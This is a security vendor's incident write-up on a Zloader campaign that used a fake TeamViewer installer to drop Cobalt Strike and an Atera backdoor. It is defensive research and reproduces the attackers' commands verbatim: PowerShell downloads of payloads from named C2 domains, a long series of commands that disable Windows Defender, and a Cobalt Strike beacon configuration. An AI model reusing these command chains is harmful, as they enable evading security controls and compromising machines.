Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike

Zloader is a banking trojan with historical ties to the Zeus malware.  Recently, Egregor and Ryuk ransomware affiliates used Zloader for the initial point of entry. Zloader featured VNC remote access capabilities and was offered on the infamous Russian-speaking cybercrime forum exploit[.]in.

Zloader infects users by leveraging malicious web advertising to redirect users into downloading malicious MSI files. Over the last year, Zloader MSI files were disguised as installers for remote working applications such as Zoom, TeamViewer, and Discord.

The Sophos Managed Threat Response Team recently detected and responded to a Zloader campaign that delivered CobaltStrike and installed Atera Agent for permanent remote access. MTR observed Zloader leveraging a known vulnerability in Windows that enabled appending malicious script content to digitally signed files provided by Microsoft, CVE-2013-3900. Within the past month, two other organizations have shared research related to this campaign. Checkpoint first published details about how Zloader abuses CVE-2013-3900. Shortly afterward Walmart GlobalTech detailed research into this attack campaign, including their findings that ‘infections are primarily located in the US and Europe’. Given Sophos’s unique observations regarding initial access and the CobaltStrike beacon deployed, we wanted to publish our corresponding research.

Timeline of Events



On Friday, December 10th, a user at an American automotive company attempted to install a remote access tool for their computer by Google searching “teamviewer download”. Unfortunately, this user accidentally clicked on a malicious advertisement, downloaded and then ran a malicious installation package called TeamViewer.msi.

The malicious download was performed using the domain teamviewer-u[.]com. This command and control domain shared the same hosting IP address as the Zloader domain zoomvideoconference[.]com at the time of our analysis.


When the downloaded TeamViewer.msi ran, it wrote to disk a malicious executable named internal.exe. The malicious executable launched parallel to the legitimate TeamViewer application:

“C:Program Files (x86)TeamViewer Germany GmbHTeamViewerinternal.exe
“C:Program Files (x86)TeamViewer Germany GmbHTeamViewerTeamViewer_Service.exe

internal.exe launched an installation script that downloaded and executed additional malware from a Zloader command and control server, clouds222[.]com.

cmd.exe /C C:/Users/User/AppData/Roaming/internal/launch.bat
powershell Invoke-WebRequest https[://]clouds222[.]com/t1m/index/processingSetRequestBat2/?servername=msi -OutFile flash.bat
C:WindowsSystem32cmd.exe” /c C:UsersUserAppDataRoaminginternalflash.bat

The downloaded script flash.bat executed a VBS script designed to bypass the user application control and elevate threat actor’s privileges.

“C:WINDOWSsystem32cacls.exe” “C:WINDOWSsystem32configsystem”
“C:WINDOWSSystem32WScript.exe” “C:UsersUserAppDataLocalTempgetadmin.vbs”


flash.bat then executed a second time, but this time it was leveraged to download additional payloads and tools from clouds222[.]com.

powershell Invoke-WebRequest https[:]//clouds222[.]com/t1m/index/processingSetRequestBat3/?servername=msi -OutFile appContast.dll
powershell Invoke-WebRequest https[:]//clouds222[.]com/t1m/index/processingSetRequestBat4/?servername=msi -OutFile flashupdate.ps1
PowerShell -NoProfile -ExecutionPolicy Bypass -Command “& ‘./flashupdate.ps1′”
ping -n 3
cmd /c del “C:UsersUserAppDataRoaminginternalflash.bat”
PowerShell -NoProfile -ExecutionPolicy Bypass -Command “& ‘./flashupdate.ps1′”

Approximately two minutes after the initial MSI malware execution, the downloaded file flashupdate.ps1 executed. This script contained functionality for installing GnuPg and decrypting the payloads.

“C:WINDOWSSystem32WbemWMIC.exe” computersystem get domain
“C:WINDOWSsystem32ARP.EXE” -a
“C:UsersUserAppDataRoaminggpg4win-2.2.5.exe” /S
“C:WINDOWSsystem32cmd.exe /c “”C:UsersUserAppDataRoamingais.bat””

The PowerShell script flashupdate.ps1 ran another post-exploitation script ais.bat. This batch script leveraged commandaadmin[.]com to download a renamed copy of the tool NSudo, a program that threat actors commonly abuse to run processes with elevated privileges (TrustedInstaller). The script used reg.exe to alter multiple registry keys to evade detection, such as suppressing notifications for windows defender. Bcdedit.exe is used to disable Windows startup repair before disabling Windows defender via ‘sc config’. It is suspected that ais.bat is derived from an open source script called ‘Defeat-Defender’ that claims to “dismantle complete windows defender protection” based on similarities in the commands observed.

powershell Invoke-WebRequest https[:]//commandaadmin[.]com/adminpriv.exe -OutFile adminpriv.exe
adminpriv -U:T -ShowWindowMode:Hide reg add “HKLMSoftwarePoliciesMicrosoftWindows DefenderUX Configuration” /v “Notification_Suppress” /t REG_DWORD /d “1” /f
adminpriv -U:T -ShowWindowMode:Hide reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem” /v “DisableTaskMgr” /t REG_DWORD /d “1” /f
adminpriv -U:T -ShowWindowMode:Hide reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem” /v “DisableCMD” /t REG_DWORD /d “1” /f
adminpriv -U:T -ShowWindowMode:Hide reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem” /v “DisableRegistryTools” /t REG_DWORD /d “1” /f
adminpriv -U:T -ShowWindowMode:Hide reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer” /v “NoRun” /t REG_DWORD /d “1” /f
powershell.exe -command “Add-MpPreference -ExclusionExtension “.bat””
adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
adminpriv -U:T sc config WinDefend start= disabled
powershell Invoke-WebRequest https[:]//commandaadmin[.]com/auto.bat -OutFile auto.bat

The downloaded payloads appContast.dll and apiicontrast.dl take advantage of a known vulnerability in Windows, CVE-2013-3900. This enabled Zloader to append malicious script content to a file digitally signed by Microsoft. The appended script content is executed using the windows binary mshta.exe.

cmd /c C:WindowsSystem32mshta.exe C:UsersUserAppDataRoamingappContast.dll
cmd /c C:WindowsSystem32mshta.exe C:UsersUserAppDataRoamingapiicontrast.dll

Additional defense evasion commands were observed when appContrast.dll executed. PowerShell was leveraged to tamper with Windows Defender modules:

Add-MpPreference -ExclusionPath ‘C:UsersUserAppDataRoaming’
Add-MpPreference -ExclusionPath ‘C:UsersUserAppDataRoaming*’
Add-MpPreference -ExclusionPath ‘C:UsersUserAppDataRoaming*’
Add-MpPreference -ExclusionPath ‘C:UsersUser*’
Add-MpPreference -ExclusionPath ‘C:UsersUser’
Add-MpPreference -ExclusionPath ‘C:WindowsSystem32WindowsPowerShell*’
Add-MpPreference -ExclusionPath ‘C:WindowsSystem32WindowsPowerShell’
Set-MpPreference -MAPSReporting 0
Add-MpPreference -ExclusionProcess ‘regsvr32’
Add-MpPreference -ExclusionProcess ‘powershell.exe’
Add-MpPreference -ExclusionExtension ‘.exe’
Add-MpPreference -ExclusionProcess ‘regsvr32*’
Add-MpPreference -ExclusionProcess ‘.dll’
Add-MpPreference -ExclusionProcess ‘*.dll’
Set-MpPreference -PUAProtection disable
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2
Add-MpPreference -ExclusionProcess ‘*.exe’
Add-MpPreference -ExclusionProcess ‘explorer.exe’
Add-MpPreference -ExclusionProcess ‘.exe’
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8
Add-MpPreference -ExclusionProcess ‘msiexec.exe’
Add-MpPreference -ExclusionProcess ‘rundll32.exe’
Add-MpPreference -ExclusionProcess ‘rundll32*’

When apiicontrast.dll is ran with MSHTA, a VBS sleep script is launched prior to decryption and execution of a Cobalt Strike payload, zoom.dll. This GPG decryption password was first observed being associated to Zloader by Twitter user @nao_sec on November 28th.

“C:WINDOWSSystem32WScript.exe” “C:UsersUserAppDataLocalTempWScriptSleeper.vbs” 45000
“C:WindowsSystem32cmd.exe” /c PowerShell -NoProfile -ExecutionPolicy Bypass -command Import-Module GnuPg; Remove-Encryption -FolderPath C:UsersUserAppDataRoaming -Password ‘bibigroup’
“C:WindowsSystem32cmd.exe” /c rundll32.exe zoom2.dll DllRegisterServer
“C:WindowsSystem32cmd.exe” /c zoom1.msi
“C:WindowsSystem32cmd.exe” /c regsvr32 zoom.dll

Concurrently, msiexec installed a remote access backdoor via AteraAgent. Ransomware affiliates linked to the Conti ransomware frequently employ AteraAgent and other remote access tools.

“C:Program Files (x86)TeamViewer Germany GmbHTeamViewerinternal.exe”
“C:Program Files (x86)ATERA NetworksAteraAgentAteraAgent.exe” /i /IntegratorLogin=”milliesoho@yahoo.com” /CompanyId=”1″ /IntegratorLoginUI=”” /CompanyIdUI=”” /FolderId=”” /AccountId=””
NET STOP AteraAgent
taskkill /f /im AteraAgent.exe
“C:Program Files (x86)ATERA NetworksAteraAgentAteraAgent.exe” /u
“C:Program FilesATERA NetworksAteraAgentAteraAgent.exe” /i /IntegratorLogin=”” /CompanyId=”” /IntegratorLoginUI=”” /CompanyIdUI=””

The decrypted Cobalt Strike payload zoom.dll attempts to communicate with the C2 server sdilok[.]com/jquery-3[.]3[.]1[.]min[.]js using the BEACON configuration below.

“BeaconType”: [
“Port”: 80,
“SleepTime”: 5000,
“MaxGetSize”: 1403644,
“Jitter”: 10,
“PublicKey_MD5”: “c60a248cc3e3ad52088035b21bf170a4”,
“C2Server”: “sdilok.com,/jquery-3.3.1.min.js”,
“UserAgent”: “Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko”,
“HttpPostUri”: “/jquery-3.3.2.min.js”,
“Malleable_C2_Instructions”: [
“Remove 1522 bytes from the end”,
“Remove 84 bytes from the beginning”,
“Remove 3931 bytes from the beginning”,
“Base64 URL-safe decode”,
“XOR mask w/ random key”
“HttpGet_Metadata”: {
“ConstHeaders”: [
“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,
“Referer: http://code.jquery.com/”,
“Accept-Encoding: gzip, deflate”
“ConstParams”: [],
“Metadata”: [
“prepend “__cfduid=””,
“header “Cookie””
“SessionId”: [],
“Output”: []
“HttpPost_Metadata”: {
“ConstHeaders”: [
“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,
“Referer: http://code.jquery.com/”,
“Accept-Encoding: gzip, deflate”
“ConstParams”: [],
“Metadata”: [],
“SessionId”: [
“parameter “__cfduid””
“Output”: [
“SSH_Banner”: “”,
“HttpGet_Verb”: “GET”,
“HttpPost_Verb”: “POST”,
“HttpPostChunk”: 0,
“Spawnto_x86”: “%windir%\syswow64\dllhost.exe”,
“Spawnto_x64”: “%windir%\sysnative\dllhost.exe”,
“CryptoScheme”: 0,
“Proxy_Behavior”: “Use IE settings”,
“Watermark”: 0,
“bStageCleanup”: “True”,
“bCFGCaution”: “False”,
“KillDate”: 0,
“bProcInject_StartRWX”: “False”,
“bProcInject_UseRWX”: “False”,
“bProcInject_MinAllocSize”: 17500,
“ProcInject_PrependAppend_x86”: [
“ProcInject_PrependAppend_x64”: [
“ProcInject_Execute”: [
“ProcInject_AllocationMethod”: “NtMapViewOfSection”,
“ProcInject_Stub”: “Ms1B7fCBDFtfSY7fRzHMbQ==”,
“bUsesCookies”: “True”,
“HostHeader”: “”,
“DNS_strategy”: “round-robin”,
“DNS_strategy_rotate_seconds”: -1,
“DNS_strategy_fail_x”: -1,
“DNS_strategy_fail_seconds”: -1

Response and Remediation


Sophos EDR/XDR detects the Cobalt Strike payload in memory as ‘C2_6a T1071.001 mem/cobalt-d’ and automatically takes actions to terminate the malicious rundll32.exe process and clean the Cobalt Strike payload from disk.


The Sophos Managed Threat Response team has an investigation created for the suspicious commands and a Cobalt Strike detection. Cobalt Strike is a remote access agent that is widely used by adversaries and is a common precursor to ransomware activity.


A Sophos MTR analyst began responding to the case only six minutes after the initial malware execution. The MTR team isolated the impacted host to prevent any further network connectivity while responding. During the investigation, the MTR team collaborated closely with SophosLabs to immediately take action as needed to help secure Sophos customers as a whole. MTR disabled the Atera backdoor and collaborated with the impacted customer to successfully limit the impact to one workstation device.

Indicators of Compromise

Command and Control
Command and Control
Command and Control – Cobalt Strike
Command and Control
Command and Control
File – ‘TeamViewer.msi’
File – ‘auto.bat’
File – ‘internal.exe
File – ‘adminpriv.exe’
File – ‘ais.bat’
File – ‘appContast.dll’
File – ‘flashupdate.ps1’
File – ‘zoom1.msi.gpg’
File – ‘zoom1.msi’
File – ‘zoom2.dll.gpg’
File – ‘zoom2.dll’


MITRE Tactic
MITRE Technique
Initial Access
T1189 – Drive-by Compromise
T1059 – Command and Scripting Interpreter

T1204 – User Execution

T1543 – Create or Modify System Process
Privilege Escalation
T1055 – Process Injection

T1548 – Abuse Elevation Control Mechanism

Defense Evasion
T1218 – Signed Binary Proxy Execution

T1562 – Impair Defenses

T1036 – Masquerading

T1140 – Deobfuscate/ Decode Files or Information

Command & Control
T1219 – Remote Access Software

T1071 – Application Layer Protocol: Web Protocols

T1482 – Domain Trust Discovery
T1041 – Exfiltration Over C&C Channel

Authored and researched by Colin Cowie with support from Stan Andic and the Sophos MTR Team.